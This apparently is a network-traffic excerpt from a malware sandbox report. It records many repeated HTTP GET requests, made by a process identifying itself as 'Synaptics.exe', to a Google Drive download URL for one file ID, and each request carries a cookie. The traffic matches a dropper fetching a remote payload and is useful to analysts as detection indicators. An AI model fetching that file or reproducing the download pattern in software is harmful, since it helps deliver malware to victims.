                            Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                            Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                            Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                            Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                            Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                            Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                            Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                            Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                            Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                            Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                            Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                            Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                            Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                            Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                            Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                            Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                            Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                            Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                            Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                            Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                            Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                            Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                            Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                            Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                            Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                            Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                            Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                            Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                            Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                            Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                            Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                            Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                            Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                            Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                            Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                            Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                            Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                            Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                            Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                            Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                            Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                            Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                            Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                            Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                            Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                            Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                            Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                            Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                            Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                            Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
